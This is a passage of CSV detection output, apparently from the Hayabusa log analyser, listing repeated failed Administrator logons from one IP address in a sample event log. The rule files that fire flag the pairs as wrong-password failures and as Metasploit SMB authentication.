+09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 